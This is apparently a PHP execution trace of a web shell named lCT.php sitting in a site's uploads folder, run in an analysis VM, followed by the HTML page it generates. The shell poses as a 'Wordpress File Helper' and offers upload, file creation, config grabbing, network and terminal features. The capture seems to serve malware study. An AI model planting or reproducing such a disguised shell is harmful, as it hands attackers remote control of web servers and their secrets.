2		A						/var/www/html/uploads/lCT.php	322	$downer = ['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
2		A						/var/www/html/uploads/lCT.php	323	$downer = 'root'
3	2048	0	0.110855	727480	function_exists	0		/var/www/html/uploads/lCT.php	327	1	'posix_getgrgid'
3	2048	1	0.110868	727520
3	2048	R			TRUE
3	2049	0	0.110881	727480	filegroup	0		/var/www/html/uploads/lCT.php	328	1	'data'
3	2049	1	0.110894	727520
3	2049	R			0
3	2050	0	0.110906	727480	posix_getgrgid	0		/var/www/html/uploads/lCT.php	328	1	0
3	2050	1	0.110927	728136
3	2050	R			['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
2		A						/var/www/html/uploads/lCT.php	328	$dgrp = ['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
2		A						/var/www/html/uploads/lCT.php	329	$dgrp = 'root'
2	2044	1	0.110972	727488
2	2044	R			'root/root'
2	2051	0	0.110986	727560	perms	1		/var/www/html/uploads/lCT.php	1085	1	'/var/www/html/uploads/data'
3	2052	0	0.110998	727560	fileperms	0		/var/www/html/uploads/lCT.php	218	1	'/var/www/html/uploads/data'
3	2052	1	0.111012	727624
3	2052	R			16895
2		A						/var/www/html/uploads/lCT.php	218	$perms = 16895
2		A						/var/www/html/uploads/lCT.php	228	$info = 'd'
2		A						/var/www/html/uploads/lCT.php	236	$info .= 'r'
2		A						/var/www/html/uploads/lCT.php	237	$info .= 'w'
2		A						/var/www/html/uploads/lCT.php	240	$info .= 'x'
2		A						/var/www/html/uploads/lCT.php	241	$info .= 'r'
2		A						/var/www/html/uploads/lCT.php	242	$info .= 'w'
2		A						/var/www/html/uploads/lCT.php	245	$info .= 'x'
2		A						/var/www/html/uploads/lCT.php	246	$info .= 'r'
2		A						/var/www/html/uploads/lCT.php	247	$info .= 'w'
2		A						/var/www/html/uploads/lCT.php	250	$info .= 'x'
3	2053	0	0.111128	727624	sprintf	0		/var/www/html/uploads/lCT.php	251	2	'%o'	16895
3	2053	1	0.111142	728008
3	2053	R			'40777'
3	2054	0	0.111155	727944	substr	0		/var/www/html/uploads/lCT.php	251	2	'40777'	-4
3	2054	1	0.111168	728040
3	2054	R			'0777'
2	2051	1	0.111181	727632
2	2051	R			'0777 >> drwxrwxrwx'
2	2055	0	0.111195	727576	checkPerm	1		/var/www/html/uploads/lCT.php	1085	2	'/var/www/html/uploads/data'	'0777 >> drwxrwxrwx'
3	2056	0	0.111210	727576	explode	0		/var/www/html/uploads/lCT.php	309	2	'>>'	'0777 >> drwxrwxrwx'
3	2056	1	0.111224	728096
3	2056	R			[0 => '0777 ', 1 => ' drwxrwxrwx']
2		A						/var/www/html/uploads/lCT.php	309	$perm = [0 => '0777 ', 1 => ' drwxrwxrwx']
3	2057	0	0.111252	728024	is_writable	0		/var/www/html/uploads/lCT.php	310	1	'/var/www/html/uploads/data'
3	2057	1	0.111267	728064
3	2057	R			TRUE
3	2058	0	0.111280	728024	trim	0		/var/www/html/uploads/lCT.php	311	1	'0777 '
3	2058	1	0.111292	728088
3	2058	R			'0777'
3	2059	0	0.111305	728344	trim	0		/var/www/html/uploads/lCT.php	311	1	'0777 '
3	2059	1	0.111316	728408
3	2059	R			'0777'
2	2055	1	0.111330	727960
2	2055	R			'<font class=\'text-success\' data-bs-toggle=\'modal\' data-bs-target=\'#chmodModal\' data-bs-perm=\'0777\' data-bs-name=\'/var/www/html/uploads/data\'>0777 </font> >> <font class=\'text-success\' data-bs-toggle=\'modal\' data-bs-target=\'#chmodModal\' data-bs-perm=\'0777\' data-bs-name=\'/var/www/html/uploads/data\'> drwxrwxrwx</font>'
2	2060	0	0.111355	727528	is_dir	0		/var/www/html/uploads/lCT.php	1069	1	'/var/www/html/uploads/lCT.php'
2	2060	1	0.111371	727568
2	2060	R			FALSE
2	2061	0	0.111384	727536	is_dir	0		/var/www/html/uploads/lCT.php	1069	1	'/var/www/html/uploads/prepend.php'
2	2061	1	0.111400	727584
2	2061	R			FALSE
2	2062	0	0.111414	727528	is_file	0		/var/www/html/uploads/lCT.php	1094	1	'/var/www/html/uploads/.'
2	2062	1	0.111428	727552
2	2062	R			FALSE
2	2063	0	0.111442	727520	is_file	0		/var/www/html/uploads/lCT.php	1094	1	'/var/www/html/uploads/..'
2	2063	1	0.111455	727568
2	2063	R			FALSE
2	2064	0	0.111469	727528	is_file	0		/var/www/html/uploads/lCT.php	1094	1	'/var/www/html/uploads/.htaccess'
2	2064	1	0.111483	727568
2	2064	R			TRUE
2	2065	0	0.111498	727472	geticon	1		/var/www/html/uploads/lCT.php	1097	1	'.htaccess'
3	2066	0	0.111515	727472	pathinfo	0		/var/www/html/uploads/lCT.php	338	2	'.htaccess'	4
3	2066	1	0.111530	727576
3	2066	R			'htaccess'
3	2067	0	0.111543	727512	strtolower	0		/var/www/html/uploads/lCT.php	338	1	'htaccess'
3	2067	1	0.111556	727544
3	2067	R			'htaccess'
2		A						/var/www/html/uploads/lCT.php	338	$ext = 'htaccess'
2	2065	1	0.111583	727472
2	2065	R			'file'
2	2068	0	0.111597	727472	checkName	1		/var/www/html/uploads/lCT.php	1097	1	'.htaccess'
3	2069	0	0.111609	727472	strlen	0		/var/www/html/uploads/lCT.php	301	1	'.htaccess'
3	2069	1	0.111621	727504
3	2069	R			9
2	2068	1	0.111634	727472
2	2068	R			'.htaccess'
2	2070	0	0.111648	727472	function_exists	0		/var/www/html/uploads/lCT.php	1098	1	'mime_content_type'
2	2070	1	0.111662	727512
2	2070	R			TRUE
2	2071	0	0.111674	727472	mime_content_type	0		/var/www/html/uploads/lCT.php	1098	1	'.htaccess'
2	2071	1	0.112690	727656
2	2071	R			'text/plain'
2	2072	0	0.112712	727624	checkName	1		/var/www/html/uploads/lCT.php	1098	1	'text/plain'
3	2073	0	0.112728	727624	strlen	0		/var/www/html/uploads/lCT.php	301	1	'text/plain'
3	2073	1	0.112742	727656
3	2073	R			10
2	2072	1	0.112755	727624
2	2072	R			'text/plain'
2	2074	0	0.112771	727584	filesize	0		/var/www/html/uploads/lCT.php	1099	1	'.htaccess'
2	2074	1	0.112787	727608
2	2074	R			64
2	2075	0	0.112800	727568	formatSize	1		/var/www/html/uploads/lCT.php	1099	1	64
2		A						/var/www/html/uploads/lCT.php	211	$types = [0 => 'B', 1 => 'KB', 2 => 'MB', 3 => 'GB', 4 => 'TB']
2		A						/var/www/html/uploads/lCT.php	212	$i = 0
3	2076	0	0.112839	727568	round	0		/var/www/html/uploads/lCT.php	213	2	64	2
3	2076	1	0.112852	727640
3	2076	R			64
2	2075	1	0.112867	727600
2	2075	R			'64 B'
2	2077	0	0.112881	727568	filemtime	0		/var/www/html/uploads/lCT.php	1100	1	'.htaccess'
2	2077	1	0.112894	727608
2	2077	R			1676251247
2	2078	0	0.112907	727568	date	0		/var/www/html/uploads/lCT.php	1100	2	'Y-m-d h:i:s'	1676251247
2	2078	1	0.112923	727896
2	2078	R			'2023-02-13 08:20:47'
2	2079	0	0.112937	727568	getowner	1		/var/www/html/uploads/lCT.php	1101	1	'.htaccess'
3	2080	0	0.112950	727568	function_exists	0		/var/www/html/uploads/lCT.php	321	1	'posix_getpwuid'
3	2080	1	0.112964	727608
3	2080	R			TRUE
3	2081	0	0.112977	727568	fileowner	0		/var/www/html/uploads/lCT.php	322	1	'.htaccess'
3	2081	1	0.112990	727608
3	2081	R			0
3	2082	0	0.113002	727568	posix_getpwuid	0		/var/www/html/uploads/lCT.php	322	1	0
3	2082	1	0.113027	728368
3	2082	R			['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
2		A						/var/www/html/uploads/lCT.php	322	$downer = ['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
2		A						/var/www/html/uploads/lCT.php	323	$downer = 'root'
3	2083	0	0.113079	727600	function_exists	0		/var/www/html/uploads/lCT.php	327	1	'posix_getgrgid'
3	2083	1	0.113093	727640
3	2083	R			TRUE
3	2084	0	0.113106	727600	filegroup	0		/var/www/html/uploads/lCT.php	328	1	'.htaccess'
3	2084	1	0.113121	727640
3	2084	R			0
3	2085	0	0.113134	727600	posix_getgrgid	0		/var/www/html/uploads/lCT.php	328	1	0
3	2085	1	0.113169	728256
3	2085	R			['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
2		A						/var/www/html/uploads/lCT.php	328	$dgrp = ['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
2		A						/var/www/html/uploads/lCT.php	329	$dgrp = 'root'
2	2079	1	0.113219	727608
2	2079	R			'root/root'
2	2086	0	0.113235	727680	perms	1		/var/www/html/uploads/lCT.php	1102	1	'/var/www/html/uploads/.htaccess'
3	2087	0	0.113248	727680	fileperms	0		/var/www/html/uploads/lCT.php	218	1	'/var/www/html/uploads/.htaccess'
3	2087	1	0.113264	727736
3	2087	R			33188
2		A						/var/www/html/uploads/lCT.php	218	$perms = 33188
2		A						/var/www/html/uploads/lCT.php	224	$info = '-'
2		A						/var/www/html/uploads/lCT.php	236	$info .= 'r'
2		A						/var/www/html/uploads/lCT.php	237	$info .= 'w'
2		A						/var/www/html/uploads/lCT.php	240	$info .= '-'
2		A						/var/www/html/uploads/lCT.php	241	$info .= 'r'
2		A						/var/www/html/uploads/lCT.php	242	$info .= '-'
2		A						/var/www/html/uploads/lCT.php	245	$info .= '-'
2		A						/var/www/html/uploads/lCT.php	246	$info .= 'r'
2		A						/var/www/html/uploads/lCT.php	247	$info .= '-'
2		A						/var/www/html/uploads/lCT.php	250	$info .= '-'
3	2088	0	0.113387	727736	sprintf	0		/var/www/html/uploads/lCT.php	251	2	'%o'	33188
3	2088	1	0.113400	728120
3	2088	R			'100644'
3	2089	0	0.113414	728056	substr	0		/var/www/html/uploads/lCT.php	251	2	'100644'	-4
3	2089	1	0.113427	728152
3	2089	R			'0644'
2	2086	1	0.113440	727744
2	2086	R			'0644 >> -rw-r--r--'
2	2090	0	0.113455	727688	checkPerm	1		/var/www/html/uploads/lCT.php	1102	2	'/var/www/html/uploads/.htaccess'	'0644 >> -rw-r--r--'
3	2091	0	0.113470	727688	explode	0		/var/www/html/uploads/lCT.php	309	2	'>>'	'0644 >> -rw-r--r--'
3	2091	1	0.113485	728208
3	2091	R			[0 => '0644 ', 1 => ' -rw-r--r--']
2		A						/var/www/html/uploads/lCT.php	309	$perm = [0 => '0644 ', 1 => ' -rw-r--r--']
3	2092	0	0.113513	728136	is_writable	0		/var/www/html/uploads/lCT.php	310	1	'/var/www/html/uploads/.htaccess'
3	2092	1	0.113530	728176
3	2092	R			FALSE
3	2093	0	0.113544	728136	is_readable	0		/var/www/html/uploads/lCT.php	312	1	'/var/www/html/uploads/.htaccess'
3	2093	1	0.113559	728176
3	2093	R			TRUE
3	2094	0	0.113572	728136	trim	0		/var/www/html/uploads/lCT.php	315	1	'0644 '
3	2094	1	0.113584	728200
3	2094	R			'0644'
3	2095	0	0.113597	728456	trim	0		/var/www/html/uploads/lCT.php	315	1	'0644 '
3	2095	1	0.113609	728520
3	2095	R			'0644'
2	2090	1	0.113622	728072
2	2090	R			'<font class=\'text-secondary\' data-bs-toggle=\'modal\' data-bs-target=\'#chmodModal\' data-bs-perm=\'0644\' data-bs-name=\'/var/www/html/uploads/.htaccess\'>0644 </font> >> <font class=\'text-secondary\' data-bs-toggle=\'modal\' data-bs-target=\'#chmodModal\' data-bs-perm=\'0644\' data-bs-name=\'/var/www/html/uploads/.htaccess\'> -rw-r--r--</font>'
2	2096	0	0.113749	727640	is_file	0		/var/www/html/uploads/lCT.php	1094	1	'/var/www/html/uploads/data'
2	2096	1	0.113764	727680
2	2096	R			FALSE
2	2097	0	0.113778	727640	is_file	0		/var/www/html/uploads/lCT.php	1094	1	'/var/www/html/uploads/lCT.php'
2	2097	1	0.113792	727680
2	2097	R			TRUE
2	2098	0	0.113806	727584	geticon	1		/var/www/html/uploads/lCT.php	1097	1	'lCT.php'
3	2099	0	0.113819	727584	pathinfo	0		/var/www/html/uploads/lCT.php	338	2	'lCT.php'	4
3	2099	1	0.113832	727680
3	2099	R			'php'
3	2100	0	0.113845	727616	strtolower	0		/var/www/html/uploads/lCT.php	338	1	'php'
3	2100	1	0.113857	727648
3	2100	R			'php'
2		A						/var/www/html/uploads/lCT.php	338	$ext = 'php'
2	2098	1	0.113881	727584
2	2098	R			'file-code'
2	2101	0	0.113895	727584	checkName	1		/var/www/html/uploads/lCT.php	1097	1	'lCT.php'
3	2102	0	0.113907	727584	strlen	0		/var/www/html/uploads/lCT.php	301	1	'lCT.php'
3	2102	1	0.113919	727616
3	2102	R			7
2	2101	1	0.113932	727584
2	2101	R			'lCT.php'
2	2103	0	0.113946	727584	function_exists	0		/var/www/html/uploads/lCT.php	1098	1	'mime_content_type'
2	2103	1	0.113960	727624
2	2103	R			TRUE
2	2104	0	0.113972	727584	mime_content_type	0		/var/www/html/uploads/lCT.php	1098	1	'lCT.php'
2	2104	1	0.115704	727656
2	2104	R			'text/x-php'
2	2105	0	0.115725	727624	checkName	1		/var/www/html/uploads/lCT.php	1098	1	'text/x-php'
3	2106	0	0.115741	727624	strlen	0		/var/www/html/uploads/lCT.php	301	1	'text/x-php'
3	2106	1	0.115754	727656
3	2106	R			10
2	2105	1	0.115767	727624
2	2105	R			'text/x-php'
2	2107	0	0.115782	727584	filesize	0		/var/www/html/uploads/lCT.php	1099	1	'lCT.php'
2	2107	1	0.115797	727600
2	2107	R			66252
2	2108	0	0.115810	727560	formatSize	1		/var/www/html/uploads/lCT.php	1099	1	66252
2		A						/var/www/html/uploads/lCT.php	211	$types = [0 => 'B', 1 => 'KB', 2 => 'MB', 3 => 'GB', 4 => 'TB']
2		A						/var/www/html/uploads/lCT.php	212	$i = 0
3	2109	0	0.115849	727560	count	0		/var/www/html/uploads/lCT.php	212	1	[0 => 'B', 1 => 'KB', 2 => 'MB', 3 => 'GB', 4 => 'TB']
3	2109	1	0.115865	727592
3	2109	R			5
2		A						/var/www/html/uploads/lCT.php	212	$bytes /= 1024
2		A						/var/www/html/uploads/lCT.php	212	$i++
3	2110	0	0.115904	727560	round	0		/var/www/html/uploads/lCT.php	213	2	64.69921875	2
3	2110	1	0.115918	727632
3	2110	R			64.7
2	2108	1	0.115933	727592
2	2108	R			'64.7 KB'
2	2111	0	0.115947	727560	filemtime	0		/var/www/html/uploads/lCT.php	1100	1	'lCT.php'
2	2111	1	0.115960	727600
2	2111	R			1676251247
2	2112	0	0.115972	727560	date	0		/var/www/html/uploads/lCT.php	1100	2	'Y-m-d h:i:s'	1676251247
2	2112	1	0.115988	727888
2	2112	R			'2023-02-13 08:20:47'
2	2113	0	0.116003	727560	getowner	1		/var/www/html/uploads/lCT.php	1101	1	'lCT.php'
3	2114	0	0.116015	727560	function_exists	0		/var/www/html/uploads/lCT.php	321	1	'posix_getpwuid'
3	2114	1	0.116028	727600
3	2114	R			TRUE
3	2115	0	0.116041	727560	fileowner	0		/var/www/html/uploads/lCT.php	322	1	'lCT.php'
3	2115	1	0.116053	727600
3	2115	R			1000
3	2116	0	0.116065	727560	posix_getpwuid	0		/var/www/html/uploads/lCT.php	322	1	1000
3	2116	1	0.116099	728376
3	2116	R			['name' => 'osboxes', 'passwd' => 'x', 'uid' => 1000, 'gid' => 1000, 'gecos' => 'osboxes.org,,,', 'dir' => '/home/osboxes', 'shell' => '/bin/bash']
2		A						/var/www/html/uploads/lCT.php	322	$downer = ['name' => 'osboxes', 'passwd' => 'x', 'uid' => 1000, 'gid' => 1000, 'gecos' => 'osboxes.org,,,', 'dir' => '/home/osboxes', 'shell' => '/bin/bash']
2		A						/var/www/html/uploads/lCT.php	323	$downer = 'osboxes'
3	2117	0	0.116153	727592	function_exists	0		/var/www/html/uploads/lCT.php	327	1	'posix_getgrgid'
3	2117	1	0.116167	727632
3	2117	R			TRUE
3	2118	0	0.116180	727592	filegroup	0		/var/www/html/uploads/lCT.php	328	1	'lCT.php'
3	2118	1	0.116192	727632
3	2118	R			1000
3	2119	0	0.116205	727592	posix_getgrgid	0		/var/www/html/uploads/lCT.php	328	1	1000
3	2119	1	0.116236	728248
3	2119	R			['name' => 'osboxes', 'passwd' => 'x', 'members' => [], 'gid' => 1000]
2		A						/var/www/html/uploads/lCT.php	328	$dgrp = ['name' => 'osboxes', 'passwd' => 'x', 'members' => [], 'gid' => 1000]
2		A						/var/www/html/uploads/lCT.php	329	$dgrp = 'osboxes'
2	2113	1	0.116281	727600
2	2113	R			'osboxes/osboxes'
2	2120	0	0.116296	727672	perms	1		/var/www/html/uploads/lCT.php	1102	1	'/var/www/html/uploads/lCT.php'
3	2121	0	0.116308	727672	fileperms	0		/var/www/html/uploads/lCT.php	218	1	'/var/www/html/uploads/lCT.php'
3	2121	1	0.116322	727736
3	2121	R			33204
2		A						/var/www/html/uploads/lCT.php	218	$perms = 33204
2		A						/var/www/html/uploads/lCT.php	224	$info = '-'
2		A						/var/www/html/uploads/lCT.php	236	$info .= 'r'
2		A						/var/www/html/uploads/lCT.php	237	$info .= 'w'
2		A						/var/www/html/uploads/lCT.php	240	$info .= '-'
2		A						/var/www/html/uploads/lCT.php	241	$info .= 'r'
2		A						/var/www/html/uploads/lCT.php	242	$info .= 'w'
2		A						/var/www/html/uploads/lCT.php	245	$info .= '-'
2		A						/var/www/html/uploads/lCT.php	246	$info .= 'r'
2		A						/var/www/html/uploads/lCT.php	247	$info .= '-'
2		A						/var/www/html/uploads/lCT.php	250	$info .= '-'
3	2122	0	0.116440	727736	sprintf	0		/var/www/html/uploads/lCT.php	251	2	'%o'	33204
3	2122	1	0.116454	728120
3	2122	R			'100664'
3	2123	0	0.116467	728056	substr	0		/var/www/html/uploads/lCT.php	251	2	'100664'	-4
3	2123	1	0.116480	728152
3	2123	R			'0664'
2	2120	1	0.116494	727744
2	2120	R			'0664 >> -rw-rw-r--'
2	2124	0	0.116507	727688	checkPerm	1		/var/www/html/uploads/lCT.php	1102	2	'/var/www/html/uploads/lCT.php'	'0664 >> -rw-rw-r--'
3	2125	0	0.116521	727688	explode	0		/var/www/html/uploads/lCT.php	309	2	'>>'	'0664 >> -rw-rw-r--'
3	2125	1	0.116535	728208
3	2125	R			[0 => '0664 ', 1 => ' -rw-rw-r--']
2		A						/var/www/html/uploads/lCT.php	309	$perm = [0 => '0664 ', 1 => ' -rw-rw-r--']
3	2126	0	0.116562	728136	is_writable	0		/var/www/html/uploads/lCT.php	310	1	'/var/www/html/uploads/lCT.php'
3	2126	1	0.116578	728176
3	2126	R			FALSE
3	2127	0	0.116591	728136	is_readable	0		/var/www/html/uploads/lCT.php	312	1	'/var/www/html/uploads/lCT.php'
3	2127	1	0.116605	728176
3	2127	R			TRUE
3	2128	0	0.116618	728136	trim	0		/var/www/html/uploads/lCT.php	315	1	'0664 '
3	2128	1	0.116630	728200
3	2128	R			'0664'
3	2129	0	0.116647	728456	trim	0		/var/www/html/uploads/lCT.php	315	1	'0664 '
3	2129	1	0.116659	728520
3	2129	R			'0664'
2	2124	1	0.116673	728072
2	2124	R			'<font class=\'text-secondary\' data-bs-toggle=\'modal\' data-bs-target=\'#chmodModal\' data-bs-perm=\'0664\' data-bs-name=\'/var/www/html/uploads/lCT.php\'>0664 </font> >> <font class=\'text-secondary\' data-bs-toggle=\'modal\' data-bs-target=\'#chmodModal\' data-bs-perm=\'0664\' data-bs-name=\'/var/www/html/uploads/lCT.php\'> -rw-rw-r--</font>'
2	2130	0	0.116699	727648	is_file	0		/var/www/html/uploads/lCT.php	1094	1	'/var/www/html/uploads/prepend.php'
2	2130	1	0.116715	727696
2	2130	R			TRUE
2	2131	0	0.116728	727592	geticon	1		/var/www/html/uploads/lCT.php	1097	1	'prepend.php'
3	2132	0	0.116742	727592	pathinfo	0		/var/www/html/uploads/lCT.php	338	2	'prepend.php'	4
3	2132	1	0.116756	727688
3	2132	R			'php'
3	2133	0	0.116769	727624	strtolower	0		/var/www/html/uploads/lCT.php	338	1	'php'
3	2133	1	0.116781	727656
3	2133	R			'php'
2		A						/var/www/html/uploads/lCT.php	338	$ext = 'php'
2	2131	1	0.116805	727592
2	2131	R			'file-code'
2	2134	0	0.116819	727592	checkName	1		/var/www/html/uploads/lCT.php	1097	1	'prepend.php'
3	2135	0	0.116832	727592	strlen	0		/var/www/html/uploads/lCT.php	301	1	'prepend.php'
3	2135	1	0.116844	727624
3	2135	R			11
2	2134	1	0.116857	727592
2	2134	R			'prepend.php'
2	2136	0	0.116872	727592	function_exists	0		/var/www/html/uploads/lCT.php	1098	1	'mime_content_type'
2	2136	1	0.116885	727632
2	2136	R			TRUE
2	2137	0	0.116898	727592	mime_content_type	0		/var/www/html/uploads/lCT.php	1098	1	'prepend.php'
2	2137	1	0.117249	727664
2	2137	R			'text/x-php'
2	2138	0	0.117270	727632	checkName	1		/var/www/html/uploads/lCT.php	1098	1	'text/x-php'
3	2139	0	0.117284	727632	strlen	0		/var/www/html/uploads/lCT.php	301	1	'text/x-php'
3	2139	1	0.117298	727664
3	2139	R			10
2	2138	1	0.117311	727632
2	2138	R			'text/x-php'
2	2140	0	0.117325	727592	filesize	0		/var/www/html/uploads/lCT.php	1099	1	'prepend.php'
2	2140	1	0.117341	727608
2	2140	R			57
2	2141	0	0.117354	727568	formatSize	1		/var/www/html/uploads/lCT.php	1099	1	57
2		A						/var/www/html/uploads/lCT.php	211	$types = [0 => 'B', 1 => 'KB', 2 => 'MB', 3 => 'GB', 4 => 'TB']
2		A						/var/www/html/uploads/lCT.php	212	$i = 0
3	2142	0	0.117392	727568	round	0		/var/www/html/uploads/lCT.php	213	2	57	2
3	2142	1	0.117405	727640
3	2142	R			57
2	2141	1	0.117420	727600
2	2141	R			'57 B'
2	2143	0	0.117433	727568	filemtime	0		/var/www/html/uploads/lCT.php	1100	1	'prepend.php'
2	2143	1	0.117447	727608
2	2143	R			1676251247
2	2144	0	0.117460	727568	date	0		/var/www/html/uploads/lCT.php	1100	2	'Y-m-d h:i:s'	1676251247
2	2144	1	0.117476	727896
2	2144	R			'2023-02-13 08:20:47'
2	2145	0	0.117490	727568	getowner	1		/var/www/html/uploads/lCT.php	1101	1	'prepend.php'
3	2146	0	0.117503	727568	function_exists	0		/var/www/html/uploads/lCT.php	321	1	'posix_getpwuid'
3	2146	1	0.117516	727608
3	2146	R			TRUE
3	2147	0	0.117530	727568	fileowner	0		/var/www/html/uploads/lCT.php	322	1	'prepend.php'
3	2147	1	0.117543	727608
3	2147	R			0
3	2148	0	0.117555	727568	posix_getpwuid	0		/var/www/html/uploads/lCT.php	322	1	0
3	2148	1	0.117580	728368
3	2148	R			['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
2		A						/var/www/html/uploads/lCT.php	322	$downer = ['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
2		A						/var/www/html/uploads/lCT.php	323	$downer = 'root'
3	2149	0	0.117632	727600	function_exists	0		/var/www/html/uploads/lCT.php	327	1	'posix_getgrgid'
3	2149	1	0.117646	727640
3	2149	R			TRUE
3	2150	0	0.117659	727600	filegroup	0		/var/www/html/uploads/lCT.php	328	1	'prepend.php'
3	2150	1	0.117672	727640
3	2150	R			0
3	2151	0	0.117684	727600	posix_getgrgid	0		/var/www/html/uploads/lCT.php	328	1	0
3	2151	1	0.117706	728256
3	2151	R			['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
2		A						/var/www/html/uploads/lCT.php	328	$dgrp = ['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
2		A						/var/www/html/uploads/lCT.php	329	$dgrp = 'root'
2	2145	1	0.117756	727608
2	2145	R			'root/root'
2	2152	0	0.117771	727696	perms	1		/var/www/html/uploads/lCT.php	1102	1	'/var/www/html/uploads/prepend.php'
3	2153	0	0.117785	727696	fileperms	0		/var/www/html/uploads/lCT.php	218	1	'/var/www/html/uploads/prepend.php'
3	2153	1	0.117800	727760
3	2153	R			33261
2		A						/var/www/html/uploads/lCT.php	218	$perms = 33261
2		A						/var/www/html/uploads/lCT.php	224	$info = '-'
2		A						/var/www/html/uploads/lCT.php	236	$info .= 'r'
2		A						/var/www/html/uploads/lCT.php	237	$info .= 'w'
2		A						/var/www/html/uploads/lCT.php	240	$info .= 'x'
2		A						/var/www/html/uploads/lCT.php	241	$info .= 'r'
2		A						/var/www/html/uploads/lCT.php	242	$info .= '-'
2		A						/var/www/html/uploads/lCT.php	245	$info .= 'x'
2		A						/var/www/html/uploads/lCT.php	246	$info .= 'r'
2		A						/var/www/html/uploads/lCT.php	247	$info .= '-'
2		A						/var/www/html/uploads/lCT.php	250	$info .= 'x'
3	2154	0	0.117917	727760	sprintf	0		/var/www/html/uploads/lCT.php	251	2	'%o'	33261
3	2154	1	0.117931	728144
3	2154	R			'100755'
3	2155	0	0.117944	728080	substr	0		/var/www/html/uploads/lCT.php	251	2	'100755'	-4
3	2155	1	0.117957	728176
3	2155	R			'0755'
2	2152	1	0.117971	727768
2	2152	R			'0755 >> -rwxr-xr-x'
2	2156	0	0.117985	727704	checkPerm	1		/var/www/html/uploads/lCT.php	1102	2	'/var/www/html/uploads/prepend.php'	'0755 >> -rwxr-xr-x'
3	2157	0	0.118000	727704	explode	0		/var/www/html/uploads/lCT.php	309	2	'>>'	'0755 >> -rwxr-xr-x'
3	2157	1	0.118015	728224
3	2157	R			[0 => '0755 ', 1 => ' -rwxr-xr-x']
2		A						/var/www/html/uploads/lCT.php	309	$perm = [0 => '0755 ', 1 => ' -rwxr-xr-x']
3	2158	0	0.118043	728152	is_writable	0		/var/www/html/uploads/lCT.php	310	1	'/var/www/html/uploads/prepend.php'
3	2158	1	0.118060	728192
3	2158	R			FALSE
3	2159	0	0.118073	728152	is_readable	0		/var/www/html/uploads/lCT.php	312	1	'/var/www/html/uploads/prepend.php'
3	2159	1	0.118088	728192
3	2159	R			TRUE
3	2160	0	0.118102	728152	trim	0		/var/www/html/uploads/lCT.php	315	1	'0755 '
3	2160	1	0.118113	728216
3	2160	R			'0755'
3	2161	0	0.118127	728472	trim	0		/var/www/html/uploads/lCT.php	315	1	'0755 '
3	2161	1	0.118139	728536
3	2161	R			'0755'
2	2156	1	0.118152	728088
2	2156	R			'<font class=\'text-secondary\' data-bs-toggle=\'modal\' data-bs-target=\'#chmodModal\' data-bs-perm=\'0755\' data-bs-name=\'/var/www/html/uploads/prepend.php\'>0755 </font> >> <font class=\'text-secondary\' data-bs-toggle=\'modal\' data-bs-target=\'#chmodModal\' data-bs-perm=\'0755\' data-bs-name=\'/var/www/html/uploads/prepend.php\'> -rwxr-xr-x</font>'
1	3	1	0.118334	735784
			0.118387	511848
TRACE END   [2023-02-12 23:21:13.572981]


Generated HTML code

<html lang="en"><head>
	<meta charset="utf-8">
	<meta name="viewport" content="width=device-width, initial-scale=1">
	<link href="https://cdn.jsdelivr.net/npm/bootstrap@5.0.1/dist/css/bootstrap.min.css" rel="stylesheet" integrity="sha384-+0n0xVW2eSR5OomGNYDnhzAbDsOXxcvSN1TPprVMTNDbiYZCxYbOOl7+AMvyTG2x" crossorigin="anonymous">
	<link rel="stylesheet" href="https://pro.fontawesome.com/releases/v5.10.0/css/all.css" integrity="sha384-AYmEC3Yw5cVb3ZcuHtOA93w35dYTsvhLPVnYs9eStHfGJvOvKxVfELGroGkvsg+p" crossorigin="anonymous">
	<title>Wordpress File Helper</title>
</head>
<body>
	<div class="container-lg">
		
		<nav class="navbar navbar-light bg-light">
			<div class="container-fluid">
				<a class="navbar-brand" href="?">
					<img src="https://image.flaticon.com/icons/png/512/2959/2959607.png" alt="logo" width="30" height="24" class="d-inline-block align-text-top">
					Wordpress File Helper				</a>
			</div>
		</nav>
		
		
		<div id="tool">
			<div class="d-flex justify-content-center flex-wrap my-3">
				<a href="?" class="m-1 btn btn-outline-dark btn-sm"><i class="fa fa-home"></i> Home</a>
				<a class="m-1 btn btn-outline-dark btn-sm" data-bs-toggle="collapse" href="#upload" role="button" aria-expanded="false" aria-controls="collapseExample"><i class="fa fa-upload"></i> Upload</a>
				<a class="m-1 btn btn-outline-dark btn-sm" data-bs-toggle="collapse" href="#newfile" role="button" aria-expanded="false" aria-controls="collapseExample"><i class="fa fa-file-plus"></i> New File</a>
				<a class="m-1 btn btn-outline-dark btn-sm" data-bs-toggle="collapse" href="#newfolder" role="button" aria-expanded="false" aria-controls="collapseExample"><i class="fa fa-folder-plus"></i> New Folder</a>
				<a class="m-1 btn btn-outline-dark btn-sm" data-bs-toggle="collapse" href="#jumping" role="button" aria-expanded="false" aria-controls="collapseExample"><i class="fa fa-link"></i> Jumping</a>
				<a class="m-1 btn btn-outline-dark btn-sm" data-bs-toggle="collapse" href="#get-config" role="button" aria-expanded="false" aria-controls="collapseExample"><i class="fa fa-wrench"></i> Get Config</a>
				<a class="m-1 btn btn-outline-dark btn-sm" data-bs-toggle="collapse" href="#network" role="button" aria-expanded="false" aria-controls="collapseExample"><i class="fa fa-network-wired"></i> Network</a>
				<a class="m-1 btn btn-outline-dark btn-sm" data-bs-toggle="collapse" href="#terminal" role="button" aria-expanded="false" aria-controls="collapseExample"><i class="fa fa-terminal"></i> Terminal</a>
			</div>
			
			<div class="row">
				<div class="col-md-12">
					<div class="collapse" id="upload" data-bs-parent="#tool">
						<div class="card card-body border-dark mb-3">
							<div class="row">
								 <div class="col-md-6">
									<form action="" method="post" enctype="multipart/form-data">
